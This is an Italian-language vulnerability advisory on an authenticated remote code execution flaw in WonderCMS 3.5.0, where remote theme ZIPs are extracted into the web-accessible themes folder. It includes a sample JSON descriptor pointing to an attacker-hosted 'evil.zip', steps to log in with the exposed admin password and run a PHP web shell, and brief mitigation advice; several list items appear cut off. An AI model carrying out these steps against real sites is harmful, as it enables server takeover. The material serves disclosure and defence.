
Exploit RCE autenticato per WonderCMS 3.5.0 tramite installazione di temi dannosi. Include meccanismi di vulnerabilità, PoC e indicazioni di mitigazione per test di sicurezza e formazione.
Esiste una vulnerabilità di esecuzione remota di codice (RCE) autenticata in WonderCMS v3.5.0.
Il problema deriva da come l'applicazione gestisce installazioni remote di temi/moduli tramite descrittori JSON. Quando un amministratore invia un file JSON remoto che fa riferimento a un archivio ZIP, il suo contenuto viene estratto in una directory accessibile via web (ad esempio /themes/). Se lo ZIP contiene un file PHP, tale file diventa accessibile sul web e può essere eseguito.
Questo comportamento introduce un rischio di RCE a causa di:
Nota: È richiesta l'autenticazione dell'amministratore, ma le installazioni predefinite espongono pubblicamente la password dell'amministratore (nella home page), utilizzano solo la password per il login e non applicano controlli di autenticazione forti.
WonderCMS accetta e tenta di installare moduli/temi remoti se il descrittore JSON inviato corrisponde al formato previsto wcms-modules.json. Un descrittore che supera il controllo del formato (e punta a un archivio ZIP) viene recuperato e il suo contenuto estratto in una directory accessibile via web (ad esempio ) senza ulteriori validazioni dei tipi di file.
/themes/<name>/Descrittore di esempio:
{
"themes": {
"SSRF": {
"name": "FAKE",
"repo": "https://example.com/",
"zip": "https://example.com/evil.zip",
"summary": "test",
"version": "1.0.0",
"image": "https://example.com/fake.png"
}
}
}
Avvertenza: non eseguire su sistemi di produzione. Utilizzare solo ambienti di test autorizzati.
Ottenere la password dell'amministratore dalla home page pubblicamente esposta di un'installazione WonderCMS predefinita.
Accedere al pannello di amministrazione.
Navigare alla sezione di installazione dei temi.
Fornire l'URL di un descrittore JSON dannoso (ad esempio, ospitato su un server controllato dall'attaccante).
Avviare l'installazione. Il server:
Installare il tema dannoso scaricato.
Accedere alla shell PHP estratta (ad esempio, http://target.com/themes/<Theme_Name>/shell.php) per eseguire comandi arbitrari.
(Nota: eseguire questi passaggi solo in un ambiente di test controllato. Sfruttare questa vulnerabilità su sistemi in produzione senza autorizzazione è illegale.)
La vulnerabilità è stata segnalata ai manutentori di WonderCMS a luglio 2025.
I manutentori hanno riconosciuto il report ma hanno osservato che, a loro avviso, questo comportamento è accettabile per gli amministratori.
Per ridurre l'esposizione:
themes/ o plugins/ tramite la configurazione del server.Queste informazioni sono fornite a scopo di ricerca difensiva sulla sicurezza e scopi educativi. Ottenere sempre la dovuta autorizzazione prima di testare o divulgare vulnerabilità.